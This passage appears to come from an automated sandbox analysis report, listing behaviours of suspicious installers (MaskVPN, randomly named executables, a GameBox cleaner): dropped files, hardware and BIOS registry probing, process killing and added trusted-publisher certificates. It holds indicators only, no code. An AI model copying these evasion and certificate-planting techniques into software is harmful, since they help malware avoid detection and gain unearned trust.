| File created | C:\Program Files (x86)\MaskVPN\is-9GMUN.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-TQ18K.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-594IN.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-JTN39.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-TN9BK.tmp | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\Uninstall.exe | C:\Users\Admin\Documents\uRay4026UiM7xMPbYxI6iz8R.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\LOGS\DPX\setuperr.log | C:\Windows\SysWOW64\WerFault.exe | N/A |
| File created | C:\Windows\Installer\f762288.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f762288.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI491B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setupact.log | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\mOwx1UOkucJxsBjOd3SFb_rP.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\mOwx1UOkucJxsBjOd3SFb_rP.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\mOwx1UOkucJxsBjOd3SFb_rP.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ | N/A | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = (binary certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = (binary certificate blob omitted) | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
